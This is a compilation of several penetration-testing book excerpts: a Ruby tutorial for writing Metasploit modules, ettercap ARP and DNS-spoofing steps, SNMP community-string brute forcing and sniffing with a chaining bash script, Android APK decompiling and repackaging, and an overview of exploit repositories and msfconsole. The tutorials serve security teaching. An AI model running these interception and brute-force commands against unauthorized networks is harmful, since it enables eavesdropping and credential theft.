Consider a scenario where the systems under the scope of a penetration test are very large in number, and we need to perform a post-exploitation function such as downloading a particular file from all the systems after exploiting them. Downloading a particular file from each system manually is time-consuming and tiring. Therefore, in a scenario like this, we can create a custom post-exploitation script that will automatically download the file from all the compromised systems.

This article focuses on building programming skill sets for Metasploit modules. It kicks off with the basics of Ruby programming and ends with developing various Metasploit modules. In this article, we will cover the following points:

- Understanding the basics of Ruby programming
- Writing programs in Ruby
- Exploring modules in Metasploit
- Writing your own modules and post-exploitation modules

Let's now understand the basics of Ruby programming and gather the essentials we need to code Metasploit modules. Before we delve deeper into coding Metasploit modules, we must know the core features of Ruby programming that are required to design these modules. Why do we require Ruby for Metasploit? The following key points will help us understand the answer to this question:

- Constructing an automated class for reusable code is a feature of the Ruby language that matches the needs of Metasploit
- Ruby is an object-oriented style of programming
- Ruby is an interpreter-based language that is fast and consumes less development time
- Earlier, Perl did not support code reuse

Ruby – the heart of Metasploit

Ruby is indeed the heart of the Metasploit framework. However, what exactly is Ruby? According to the official website, Ruby is a simple and powerful programming language, designed by Yukihiro Matsumoto in 1995. It is further defined as a dynamic, reflective, and general-purpose object-oriented programming language with functions similar to Perl.

You can download Ruby for Windows/Linux from http://rubyinstaller.org/downloads/. You can refer to an excellent resource for learning Ruby practically at http://tryruby.org/levels/1/challenges/0.

Creating your first Ruby program

Ruby is an easy-to-learn programming language. Now, let's start with the basics of Ruby. Remember, however, that Ruby is a vast programming language, and covering all of its capabilities would push us beyond the scope of this article. Therefore, we will only stick to the essentials that are required in designing Metasploit modules.

Interacting with the Ruby shell

Ruby offers an interactive shell, and working on it will help us understand the basics clearly. So, let's get started. Open your CMD/terminal and type irb in it to launch the Ruby interactive shell. Let's input something into the Ruby shell and see what happens; suppose I type in the number 2, as follows:

```
irb(main):001:0> 2
=> 2
```

The shell throws back the value. Now, let's give another input, such as an addition operation, as follows:

```
irb(main):002:0> 2+3
=> 5
```

We can see that if we input numbers in an expression style, the shell gives us back the result of the expression.
Let's perform some functions on strings, such as storing the value of a string in a variable, as follows:

```
irb(main):005:0> a= "nipun"
=> "nipun"
irb(main):006:0> b= "loves metasploit"
=> "loves metasploit"
```

After assigning values to the variables a and b, let's see how the shell responds when we type a and a+b on the shell's console:

```
irb(main):014:0> a
=> "nipun"
irb(main):015:0> a+b
=> "nipunloves metasploit"
```

We can see that when we typed in a as input, it reflected the value stored in the variable named a. Similarly, a+b gave us back the concatenated result of variables a and b.

Defining methods in the shell

A method or function is a set of statements that execute when we make a call to it. We can declare methods easily in Ruby's interactive shell, or we can declare them in a script as well. Methods are an important aspect when working with Metasploit modules. Let's see the syntax:

```
def method_name [( [arg [= default]]...[, * arg [, &expr ]])]
  expr
end
```

To define a method, we use def followed by the method name, with arguments and expressions in parentheses. We also use an end statement following all the expressions to close the method definition. Here, arg refers to the arguments that a method receives, and expr refers to the expressions that a method receives or calculates inline. Let's have a look at an example:

```
irb(main):001:0> def week2day(week)
irb(main):002:1> week=week*7
irb(main):003:1> puts(week)
irb(main):004:1> end
=> nil
```

We defined a method named week2day that receives an argument named week. Furthermore, we multiplied the received argument by 7 and printed out the result using the puts function. Let's call this function with 4 as the argument:

```
irb(main):005:0> week2day(4)
28
=> nil
```

We can see our function printing out the correct value by performing the multiplication operation. Ruby offers two different functions to print output: puts and print. However, when it comes to the Metasploit framework, the print_line function is used.

Variables and data types in Ruby

A variable is a placeholder for values that can change at any given time. In Ruby, we declare a variable only when we need to use it. Ruby supports numerous data types, but we will only discuss those that are relevant to Metasploit. Let's see what they are.

Working with strings

Strings are objects that represent a stream or sequence of characters. In Ruby, we can assign a string value to a variable with ease, as seen in the previous example. Simply placing the value in double or single quotation marks assigns it to a string. It is recommended to use double quotation marks, because single quotations can create problems. Let's have a look at the problem that may arise:

```
irb(main):005:0> name = 'Msf Book'
=> "Msf Book"
irb(main):006:0> name = 'Msf's Book'
irb(main):007:0'
```

We can see that when we used a single quotation mark, it worked. However, when we tried to put Msf's instead of the value Msf, an error occurred. This is because the shell read the single quotation mark in the Msf's string as the end of the single-quoted string, which is not the case; this situation caused a syntax-based error.

The split function

We can split the value of a string into a number of consecutive variables using the split function.
Let's have a look at a quick example that demonstrates this:

```
irb(main):011:0> name = "nipun jaswal"
=> "nipun jaswal"
irb(main):012:0> name,surname=name.split(' ')
=> ["nipun", "jaswal"]
irb(main):013:0> name
=> "nipun"
irb(main):014:0> surname
=> "jaswal"
```

Here, we split the value of the entire string into two consecutive strings, name and surname, using the split function. The function split the string in two by treating the space as the split position.

The squeeze function

The squeeze function removes runs of repeated characters, such as extra spaces, from the given string, as shown in the following code snippet:

```
irb(main):016:0> name = "Nipun  Jaswal"
=> "Nipun  Jaswal"
irb(main):017:0> name.squeeze
=> "Nipun Jaswal"
```

Numbers and conversions in Ruby

We can use numbers directly in arithmetic operations. However, remember to convert a string into an integer when working on user input using the .to_i function. Simultaneously, we can convert an integer into a string using the .to_s function. Let's have a look at some quick examples and their output:

```
irb(main):006:0> b="55"
=> "55"
irb(main):007:0> b+10
TypeError: no implicit conversion of Fixnum into String
        from (irb):7:in `+'
        from (irb):7
        from C:/Ruby200/bin/irb:12:in `<main>'
irb(main):008:0> b.to_i+10
=> 65
irb(main):009:0> a=10
=> 10
irb(main):010:0> b="hello"
=> "hello"
irb(main):011:0> a+b
TypeError: String can't be coerced into Fixnum
        from (irb):11:in `+'
        from (irb):11
        from C:/Ruby200/bin/irb:12:in `<main>'
irb(main):012:0> a.to_s+b
=> "10hello"
```

We can see that when we assigned a value to b in quotation marks, it was considered a string, and an error was generated while performing the addition operation. Nevertheless, as soon as we used the to_i function, it converted the value from a string into an integer, and the addition was performed successfully. Similarly, with regards to strings, when we tried to concatenate an integer with a string, an error showed up. However, after the conversion, it worked.

Ranges in Ruby

Ranges are important aspects and are widely used in auxiliary modules such as scanners and fuzzers in Metasploit. Let's define a range and look at the various operations we can perform on this data type:

```
irb(main):028:0> zero_to_nine= 0..9
=> 0..9
irb(main):031:0> zero_to_nine.include?(4)
=> true
irb(main):032:0> zero_to_nine.include?(11)
=> false
irb(main):002:0> zero_to_nine.each{|zero_to_nine| print(zero_to_nine)}
0123456789=> 0..9
irb(main):003:0> zero_to_nine.min
=> 0
irb(main):004:0> zero_to_nine.max
=> 9
```

We can see that a range offers various operations, such as searching, finding the minimum and maximum values, and displaying all the data in the range. Here, the include? function checks whether the value is contained in the range. In addition, the min and max functions display the lowest and highest values in the range.

Arrays in Ruby

We can simply define arrays as lists of various values. Let's have a look at an example:

```
irb(main):005:0> name = ["nipun","james"]
=> ["nipun", "james"]
irb(main):006:0> name[0]
=> "nipun"
irb(main):007:0> name[1]
=> "james"
```

So, up to this point, we have covered all the variables and data types that we will need for writing Metasploit modules.
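Before moving on, here is a tiny standalone illustration (not Metasploit code) of why ranges matter for scanner-style modules: a scanner typically walks a range of ports or hosts exactly like this:

```ruby
# Iterate a range of ports, as an auxiliary scanner module might.
ports = 20..25

ports.each do |port|
  puts "checking port #{port}"
end

puts ports.include?(21)  # => true
```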
For more information on variables and data types, refer to the following link: http://www.tutorialspoint.com/ruby/

Refer to a quick cheat sheet for using Ruby programming effectively at the following links:

- https://github.com/savini/cheatsheets/raw/master/ruby/RubyCheat.pdf
- http://hyperpolyglot.org/scripting

Methods in Ruby

A method is another name for a function. Programmers with a background other than Ruby might use these terms interchangeably. A method is a subroutine that performs a specific operation. The use of methods implements the reuse of code and decreases the length of programs significantly. Defining a method is easy: the definition starts with the def keyword and ends with the end statement. Let's consider a simple program to understand how they work, for example, printing out the square of 50:

```ruby
def print_data(par1)
  square = par1*par1
  return square
end

answer = print_data(50)
print(answer)
```

The print_data method receives the parameter sent from the main code, multiplies it by itself, and sends it back using the return statement. The program saves this returned value in a variable named answer and prints the value.

Decision-making operators

Decision making is also a simple concept, as in any other programming language. Let's have a look at an example:

```
irb(main):001:0> 1 > 2
=> false
irb(main):002:0> 1 < 2
=> true
```

Let's also consider the case of string data:

```
irb(main):005:0> "Nipun" == "nipun"
=> false
irb(main):006:0> "Nipun" == "Nipun"
=> true
```

Let's consider a simple program with decision-making operators:

```ruby
# Function
def decision(par1)
  print(par1)
  if(par1%2==0)
    print("Number is Even")
  else
    print("Number is Odd")
  end
end

# Main
num = gets
num1 = num.to_i
decision(num1)
```

We ask the user to enter a number and store it in a variable named num using gets. However, gets saves the user input in the form of a string. So, we first change its data type to an integer using the to_i method and store it in a different variable named num1. Next, we pass this value as an argument to the method named decision and check whether the number is divisible by two. If the remainder is equal to zero, the number is even, so the if block is executed; if the condition is not met, the else block is executed. Note that the method definition is placed before the call: top-level Ruby code runs in order, so a method must be defined before it is invoked. The output of the preceding program will be something similar to the following screenshot when executed in a Windows-based environment:
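The screenshot is not reproduced here; since both print calls omit newlines, a run of the program with 4 as the input would look something like this:

```
4
4Number is Even
```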


Network Exploitation and Monitoring

Packt
22 May 2014
8 min read
Man-in-the-middle attacks

Using ARP abuse, we can perform more elaborate man-in-the-middle (MITM)-style attacks, building on the ability to abuse address resolution and host identification schemes. This section will focus on the methods you can use to do just that.

MITM attacks are aimed at fooling two entities on a given network into communicating by the proxy of an unauthorized third party, or allowing a third party to access information in transit between two entities on a network. For instance, when a victim connects to a service on the local network or on a remote network, a man-in-the-middle attack gives you, as an attacker, the ability to eavesdrop on or even augment the communication happening between the victim and its service. By service, we could mean a web (HTTP), FTP, or RDP service, or really anything that doesn't have the inherent means to defend itself against MITM attacks, which turns out to be quite a lot of the services we use today!

Ettercap DNS spoofing

Ettercap is a tool that provides a simple command-line and graphical interface to perform MITM attacks using a variety of techniques. In this section, we will focus on applications of ARP spoofing attacks, namely DNS spoofing. You can set up a DNS spoofing attack with ettercap by performing the following steps:

1. Before we get ettercap up and running, we need to modify the file that holds the DNS records for our soon-to-be-spoofed DNS server. This file is found under /usr/share/ettercap/etter.dns. You need to either add DNS names and IP addresses or modify the ones currently in the file by replacing all the IPs with yours, if you'd like to act as the intercepting host (an example entry is sketched after these steps).

2. Now that our DNS server records are set up, we can invoke ettercap. Invoking ettercap is pretty straightforward; here's the usage specification:

```
ettercap [OPTIONS] [TARGET1] [TARGET2]
```

3. To perform a MITM attack using ettercap, you need to supply the -M switch and pass it an argument indicating the MITM method you'd like to use. In addition, you will also need to specify that you'd like to use the DNS spoofing plugin. Here's what the invocation looks like:

```
ettercap -M arp:remote -P dns_spoof [TARGET1] [TARGET2]
```

Here, TARGET1 and TARGET2 are the host you want to intercept and either the default gateway or the DNS server, interchangeably. To target the host at address 192.168.10.107 with a default gateway of 192.168.10.1, you will invoke the following command:

```
ettercap -M arp:remote -P dns_spoof /192.168.10.107/ /192.168.10.1/
```

Once launched, ettercap will begin poisoning the ARP tables of the specified hosts and listening for any DNS requests to the domains it's configured to resolve.
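For reference, entries in etter.dns use a zone-file-like syntax of name, record type, and address. A hypothetical redirect, with 192.168.10.99 standing in for your Kali address, might look like this:

```
packtpub.com      A   192.168.10.99
*.packtpub.com    A   192.168.10.99
www.packtpub.com  PTR 192.168.10.99
```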
Naturally, any penetration tester with an exposed SNMP service on their target network will need to know how to extract any potentially useful information from it.

About SNMP security

SNMP services before Version 3 were not designed with security in mind. Authentication to these services often comes in the form of a simple string of characters called a community string. Another common implementation flaw inherent to SNMP Version 1 and 2 is that they are susceptible to brute-forcing and eavesdropping on communication.

To enumerate SNMP servers for information using the Kali Linux tools, you could resort to a number of techniques. The most obvious one will be snmpwalk, and you can use it by issuing the following command:

snmpwalk -v [1 | 2c | 3] -c [community string] [target host]

For example, let's say we were targeting 192.168.10.103 with a community string of public, which is a common community string setting; you will then invoke the following command to get information from the SNMP service:

snmpwalk -v 1 -c public 192.168.10.103

Here, we opted to use SNMP Version 1, hence the -v 1 in the preceding invocation. The output will look something like the following screenshot:

As you can see, this actually extracts some pretty detailed information about the targeted host. Whether this is a critical vulnerability or not will depend on the kind of information exposed. On Microsoft Windows machines and some popular router operating systems, SNMP services could expose user credentials and even allow remote attackers to modify them maliciously, should the attackers have write access to the SNMP database.

Exploiting SNMP successfully often depends strongly on the device implementing the service. You could imagine that for routers, your target will probably be the routing table or the user accounts on the device. For other host types, the attack surface may be quite different. Try to assess the risk of SNMP-based flaws and information leaks with respect to the host and possibly the wider network it's hosted on. Don't forget that SNMP is all about sharing information, information that other hosts on your network probably trust. Think about the kind of information accessible and what you will be able to do with it should you have the ability to influence it. If you can attack the host, attack the hosts that trust it.

Another collection of tools is really great at collecting information from SNMP services: the snmp_enum and snmp_login scripts and similar modules available in the Metasploit Framework. The snmp_enum script does pretty much exactly what snmpwalk does, except that it structures the extracted information in a friendlier format, which makes it easier to understand. Here's an example:

msfcli auxiliary/scanner/snmp/snmp_enum [OPTIONS] [MODE]

The options available for this module are shown in the following screenshot:

Here's an example invocation against the host in our running example:

msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=192.168.10.103

The preceding command produces the following output:

You will notice that we didn't specify the community string in the invocation. This is because the module assumes a default of public. You can specify a different one using the COMMUNITY parameter.

In other situations, you may not always be lucky enough to know the community string in advance. However, SNMP Version 1, 2, and 2c do not inherently have any protection against brute-force attacks, nor do they use any form of network-based encryption.
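Rather than walking the entire MIB, you can also point snmpwalk at a specific subtree. A quick sketch using two standard OIDs (the system group from MIB-2 and the running-process names from the Host Resources MIB); the target address and community string are the ones assumed in our running example:

# system description, uptime, contact, and so on (MIB-2 system group)
snmpwalk -v 1 -c public 192.168.10.103 1.3.6.1.2.1.1

# names of running processes (Host Resources MIB, hrSWRunName)
snmpwalk -v 1 -c public 192.168.10.103 1.3.6.1.2.1.25.4.2.1.2

Restricting the walk this way keeps the output manageable and makes it easier to spot the pieces of information that actually matter for your assessment.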
In the case of SNMP Version 1 and 2c, you could use a nifty Metasploit module called snmp_login that will run through a list of possible community strings and determine the level of access the enumerated strings give you. You can use it by running the following command:

msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=192.168.10.103

The preceding command produces the following output:

As seen in the preceding screenshot, once the run is complete, it will list the enumerated strings along with the level of access granted. The snmp_login module uses a static list of possible strings to do its enumeration by default, but you could also run this module against some of the password lists that ship with Kali Linux, as follows:

msfcli auxiliary/scanner/snmp/snmp_login PASS_FILE=/usr/share/wordlists/rockyou.txt RHOSTS=192.168.10.103

This will use the rockyou.txt wordlist to look for strings to guess with.

Because all of these Metasploit modules are command line-driven, you can of course combine them. For instance, if you'd like to brute-force a host for its SNMP community strings and then run the enumeration module on the strings found, you can do this by crafting a bash script as shown in the following example:

#!/bin/bash
if [ $# != 1 ]
then
  echo "USAGE: . snmp.sh [HOST]"
  exit 1
fi
TARGET=$1
echo "[*] Running SNMP enumeration on '$TARGET'"
for comm_string in `msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=$TARGET E 2> /dev/null | awk -F"'" '/access with community/ { print $2 }'`;
do
  echo "[*] found community string '$comm_string' ...running enumeration";
  msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=$TARGET COMMUNITY=$comm_string E 2> /dev/null;
done

The following command shows you how to use it:

. snmp.sh [TARGET]

In our running example, it is used as follows:

. snmp.sh 192.168.10.103

Other than guessing or brute-forcing SNMP community strings, you could also use TCPDump to filter out any packets that could contain unencrypted SNMP authentication information. Here's a useful example:

tcpdump udp port 161 -i eth0 -vvv -A

The preceding command will produce the following output:

Without going too much into detail about the SNMP packet structure, looking through the printable strings captured, it's usually pretty easy to spot the community string. You may also want to look at building a more comprehensive packet-capturing tool using something such as Scapy, which ships with Kali Linux.
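If you prefer a filter that pulls out just the community string rather than a full packet dump, tshark (the console version of Wireshark, also present in Kali) can do the protocol dissection for you. A sketch, assuming the same interface as above:

# print the community string field, plus source and destination,
# for any SNMP packet seen on eth0
tshark -i eth0 -f "udp port 161" -T fields -e snmp.community -e ip.src -e ip.dst

The capture filter limits the sniff to SNMP traffic, and the field extraction saves you from scanning raw printable strings by eye.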
Reversing Android Applications

Packt
20 Mar 2014
8 min read
(For more resources related to this topic, see here.)

Android application teardown

An Android application is an archive file of the data and resource files created while developing the application. The extension of an Android application is .apk, meaning application package, which includes the following files and folders in most cases:

classes.dex (file)
AndroidManifest.xml (file)
META-INF (folder)
resources.arsc (file)
res (folder)
assets (folder)
lib (folder)

In order to verify this, we could simply unzip the application using any archive manager application, such as 7zip, WinRAR, or any preferred application. On Linux or Mac, we could simply use the unzip command in order to show the contents of the archive package, as shown in the following screenshot:

Here, we have used the -l (list) flag in order to simply show the contents of the archive package instead of extracting it. We could also use the file command in order to see whether it is a valid archive package.

An Android application consists of various components, which together create the working application. These components are Activities, Services, Broadcast Receivers, Shared Preferences, Intents, and Content Providers. Before proceeding, let's have a quick walkthrough of what these different components are all about:

Activities: These are the visual screens which a user could interact with. These may include buttons, images, TextView, or any other visual component.

Services: These are the Android components which run in the background and carry out specific tasks specified by the developer. These tasks may include anything from downloading a file over HTTP to playing music in the background.

Broadcast Receivers: These are the receivers in the Android application that listen to incoming broadcast messages from the Android system, or from other applications present on the device. Once they receive a broadcast message, a particular action can be triggered depending on predefined conditions. The conditions could range from receiving an SMS or an incoming phone call to a change in the power supply, and so on.

Shared Preferences: These are used by an application in order to save small sets of data for the application. This data is stored inside a folder named shared_prefs. These small datasets may include name-value pairs such as the user's score in a game and login credentials. Storing sensitive information in shared preferences is not recommended, as it may fall vulnerable to data stealing and leakage.

Intents: These are the components which are used to bind two or more different Android components together. Intents could be used to perform a variety of tasks, such as starting an action, switching activities, and starting services.

Content Providers: These are used to provide access to a structured set of data to be used by the application. An application can access and query its own data or the data stored in the phone using the Content Providers.

Now that we know the Android application internals and what an application is composed of, we can move on to reversing an Android application, that is, getting the readable source code and other data sources when we just have the .apk file with us.

Reversing an Android application

As we discussed earlier, Android applications are simply archive files of data and resources. Even so, we can't simply unzip the archive package (.apk) and get the readable sources. For these scenarios, we have to rely on tools that will convert the byte code (as in classes.dex) into readable source code.
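As a quick sketch of the verification step described above, assuming a hypothetical package named helloworld.apk in the current directory:

# list the archive contents without extracting them
unzip -l helloworld.apk

# confirm that the package is a valid archive
file helloworld.apk
# expected output along the lines of:
# helloworld.apk: Zip archive data, at least v2.0 to extract

If file does not report Zip archive data, the package is either corrupt or not a genuine .apk.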
One of the approaches to convert byte code to readable files is using a tool called dex2jar. The .dex file is Java bytecode converted to Dalvik bytecode, making it optimized and efficient for mobile platforms. This free tool simply converts the .dex file present in the Android application to a corresponding .jar file. Please follow the ensuing steps:

Download the dex2jar tool from https://code.google.com/p/dex2jar/.

Now we can run it against our application's .dex file and convert it to the .jar format.

Now, all we need to do is go to the command prompt and navigate to the folder where dex2jar is located. Next, we need to run the d2j-dex2jar.bat file (on Windows) or the d2j-dex2jar.sh file (on Linux/Mac) and provide the application name and path as the argument. Here, as the argument, we could simply use the .apk file, or we could even unzip the .apk file and then pass the classes.dex file instead, as shown in the following screenshot:

As we can see in the preceding screenshot, dex2jar has successfully converted the .dex file of the application to a .jar file named helloworld-dex2jar.jar. Now, we can simply open this .jar file in any Java graphical viewer such as JD-GUI, which can be downloaded from its official website at http://jd.benow.ca/.

Once we have downloaded and installed JD-GUI, we can go ahead and open it. It will look like the one shown in the following screenshot:

Here, we can now open up the converted .jar file from the earlier step and see all the Java source code in JD-GUI. To open a .jar file, we simply navigate to File | Open. In the right-hand side pane, we can see the Java sources and all the methods of the Android application.

Note that the decompilation process will give you an approximate version of the original Java source code. This won't matter in most cases; however, in some cases, you might see that some of the code is missing from the converted .jar file. Also, if the application developer is using protections against decompilation such as ProGuard, then when we decompile the application using dex2jar or Apktool, we won't see the exact source code; instead, we will see a bunch of different source files, which won't be an exact representation of the original source code.

Using Apktool to reverse an Android application

Another way of reversing an Android application is converting the .dex file to smali files. A smali is a file format whose syntax is similar to a language known as Jasmin. We won't be going in depth into the smali file format as of now. For more information, take a look at the online wiki at https://code.google.com/p/smali/wiki/ in order to get an in-depth understanding of smali.

Once we have downloaded Apktool and configured it, we are all set to go. The main advantage of Apktool over JD-GUI is that it is bidirectional. This means that if you decompile an application, modify it, and then recompile it back using Apktool, it will recompile perfectly and generate a new .apk file. However, dex2jar and JD-GUI won't be able to do this, as they give approximate code and not the exact code.

So, in order to decompile an application using Apktool, all we need to do is pass the .apk filename along with the Apktool binary. Once decompiled, Apktool will create a new folder with the application name in which all of the files will be stored. To decompile, we will simply go ahead and use apktool d [app-name].apk. Here, the d flag stands for decompilation.
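A sketch of the conversion step on Linux/Mac, again using the hypothetical helloworld.apk:

# convert the application's Dalvik bytecode to a Java .jar
./d2j-dex2jar.sh helloworld.apk
# produces helloworld-dex2jar.jar in the current directory

# the same works against an extracted classes.dex
unzip helloworld.apk classes.dex
./d2j-dex2jar.sh classes.dex

Either invocation leaves you with a .jar file ready to be opened in JD-GUI.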
In the following screenshot, we can see an app being decompiled using Apktool:

Now, if we go inside the smali folder, we will see a bunch of different smali files, which will contain the code of the Java classes that were written while developing the application. Here, we can also open up a file, change the values, and use Apktool to build it back again.

To build a modified application from smali, we will use the b (build) flag in Apktool:

apktool b [decompiled folder name] [target-app-name].apk

However, in order to decompile, modify, and recompile applications, I would personally recommend using another tool called Virtuous Ten Studio (VTS). This tool offers functionality similar to Apktool, with the difference that VTS presents it in a nice graphical interface, which is relatively easy to use. The only limitation of this tool is that it runs natively only in the Windows environment. We can go ahead and download VTS from the official download link, http://www.virtuous-ten-studio.com/. The following is a screenshot of the application decompiling the same project:

Summary

In this article, we covered some of the methods and techniques that are used to reverse Android applications.

Resources for Article:
Further resources on this subject:
Android Native Application API [Article]
Introducing an Android platform [Article]
Animating Properties and Tweening Pages in Android 3-0 [Article]
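Putting the round trip together: a minimal sketch, again assuming the hypothetical helloworld.apk. Note that a rebuilt APK must be re-signed before Android will install it; the keystore and alias names below are placeholders, and the exact apktool build syntax may vary between versions:

# decompile into a folder named helloworld/
apktool d helloworld.apk

# ...edit files under helloworld/smali/ as needed...

# rebuild the modified sources into a new APK
apktool b helloworld helloworld-modified.apk

# create a throwaway signing key and sign the rebuilt package
keytool -genkey -keystore my.keystore -alias mykey -keyalg RSA -validity 10000
jarsigner -keystore my.keystore helloworld-modified.apk mykey

Without the signing step, the modified package will be rejected at install time.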

Target Exploitation

Packt
14 Mar 2014
14 min read
(For more resources related to this topic, see here.)

Vulnerability research

Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating vulnerabilities that could exist in that product. Conducting vulnerability research is not easy, and neither is it a one-click task. It requires a strong knowledge base and several distinct skills to carry out security analysis. The following are the factors involved in carrying out security analysis:

Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures that exist in any programming language grants the tester a decisive advantage in finding vulnerabilities. Apart from the basic knowledge of programming languages, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and cache. These concepts apply in almost any programming language such as C/C++, Python, Perl, and Assembly. To learn the basics of writing exploit code from a discovered vulnerability, please visit http://www.phreedom.org/presentations/exploit-code-development/.

Reverse engineering: This is another wide area for discovering the vulnerabilities that could exist in an electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce code from a given system without any prior knowledge of its internal workings, to examine it for error conditions, poorly designed functions, and protocols, and to test the boundary conditions. There are several reasons that inspire the practice of reverse engineering skills, such as the removal of copyright protection from software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring sensitive data. Reverse engineering adds two layers of concept to examining the code of an application: source code auditing and binary auditing. If you have access to the application source code, you can accomplish the security analysis through automated tools or by manually studying the source in order to extract the conditions where the vulnerability can be triggered. On the other hand, binary auditing simplifies the task of reverse engineering where the application exists without any source code. Disassemblers and decompilers are two generic types of tools that may assist the auditor with binary analysis. Disassemblers generate assembly code from a compiled binary program, while decompilers generate high-level language code from a compiled binary program. However, dealing with either of these tools is quite challenging and requires careful assessment.

Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage tools, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing purposes. Explaining each of these tool categories is out of the scope of this book. However, you may find several useful tools already present in Kali Linux. To keep track of the latest reverse code engineering tools, we strongly recommend that you visit the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools.
Exploitability and payload construction: This is the final step in writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of vulnerable applications from the reverse engineering stage to polish shellcode with an encoding mechanism in order to avoid bad characters that may result in the termination of the exploit process.

Depending on the type and classification of the vulnerability discovered, it is very important to follow a specific strategy that may allow you to execute arbitrary code or commands on the target system. As a professional penetration tester, you may always be looking for loopholes that result in getting shell access to your target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework, which will show these tools and techniques.

Vulnerability and exploit repositories

For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with PoC exploit code to prove the feasibility and viability of a vulnerability found in specific software or an application. And many still remain unaddressed. The availability of public exploits and vulnerability information makes it easier for penetration testers to quickly search for and retrieve the best available exploit that may suit their target system environment. You can also port one type of exploit to another type (for example, Win32 architecture to Linux architecture), provided that you hold intermediate programming skills and a clear understanding of the OS-specific architecture. We have provided a combined set of online repositories that may help you to track down any vulnerability information or its exploit by searching through them.

Not every single vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors. The following is a list of online repositories:

Bugtraq SecurityFocus: http://www.securityfocus.com
OSVDB Vulnerabilities: http://osvdb.org
Packet Storm: http://www.packetstormsecurity.org
VUPEN Security: http://www.vupen.com
National Vulnerability Database: http://nvd.nist.gov
ISS X-Force: http://xforce.iss.net
US-CERT Vulnerability Notes: http://www.kb.cert.org/vuls
US-CERT Alerts: http://www.us-cert.gov/cas/techalerts/
SecuriTeam: http://www.securiteam.com
Government Security Org: http://www.governmentsecurity.org
Secunia Advisories: http://secunia.com/advisories/historic/
Security Reason: http://securityreason.com
XSSed XSS-Vulnerabilities: http://www.xssed.com
Security Vulnerabilities Database: http://securityvulns.com
SEBUG: http://www.sebug.net
BugReport: http://www.bugreport.ir
MediaService Lab: http://lab.mediaservice.net
Intelligent Exploit Aggregation Network: http://www.intelligentexploit.com
Hack0wn: http://www.hack0wn.com

Although there are many other Internet resources available, we have listed only a few reviewed ones. Kali Linux comes with an integrated exploit database from Offensive Security. This provides the extra advantage of keeping all archived exploits up to date on your system for future reference and use.
To access Exploit-DB, execute the following commands on your shell:

# cd /usr/share/exploitdb/
# vim files.csv

This will open a complete list of the exploits currently available from Exploit-DB; the exploit files themselves reside under the /usr/share/exploitdb/platforms/ directory. These exploits are categorized in their relevant subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handful of compilers and interpreters that support the execution of these exploits.

How to extract particular information from the exploits list?

Using the power of bash commands, you can manipulate the output of any text file in order to retrieve meaningful data. You can either use searchsploit, or this can also be accomplished by typing cat files.csv | grep '"' | cut -d";" -f3 on your console. It will extract the list of exploit titles from the files.csv file. To learn the basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html.

Advanced exploitation toolkit

Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We have explained it in greater detail and presented a number of scenarios that will effectively increase productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization, making it easy for a penetration tester with optimum programming skills to extend or develop custom plugins and tools. The architecture of the framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of various interfaces and modules. Interfaces (console, CLI, web, and GUI) basically provide the front-end operational activity when dealing with any type of module (exploits, payloads, auxiliaries, encoders, and NOPs). Each of the following modules has its own meaning and is function-specific to the penetration testing process:

Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system.

Payload: This module is malicious code intended as a part of an exploit, or independently compiled, to run arbitrary commands on the target system.

Auxiliaries: These modules are a set of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks.

Encoders: These modules are provided to evade the detection of antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation.

No Operation or No Operation Performed (NOP): This module is an assembly language instruction often added into a shellcode to perform nothing but to cover a consistent payload space.

For your understanding, we have explained the basic use of two well-known Metasploit interfaces with their relevant command-line options. Each interface has its own strengths and weaknesses. However, we strongly recommend that you stick to the console version, as it supports most of the framework features.

MSFConsole

MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interfaces for penetration testers to make the best use of the exploitation framework.
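As a quick sketch of the searchsploit route, which saves you the manual cat/grep/cut pipeline; the keywords below are only examples:

# search the local Exploit-DB copy by keyword
searchsploit ms08-067

# combine terms to narrow the results
searchsploit linux kernel privilege escalation

searchsploit matches against the same files.csv data, so anything you can find with the pipeline you can find this way as well.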
To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework or use the terminal to execute the following command:

# msfconsole

You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command:

msf > help

This will display two sets of commands; one set will be widely used across the framework, and the other will be specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved through the use of -h following the core command. Let us examine the use of the show command as follows:

msf > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options
[*] Additional module-specific parameters are: advanced, evasion, targets, actions

This command is typically used to display the available modules of a given type, or all of the modules. The most frequently used commands could be any of the following:

show auxiliary: This command will display all the auxiliary modules.
show exploits: This command will get a list of all the exploits within the framework.
show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads. For instance, Windows payloads will only be displayed with Windows-compatible exploits.
show encoders: This command will print the list of available encoders.
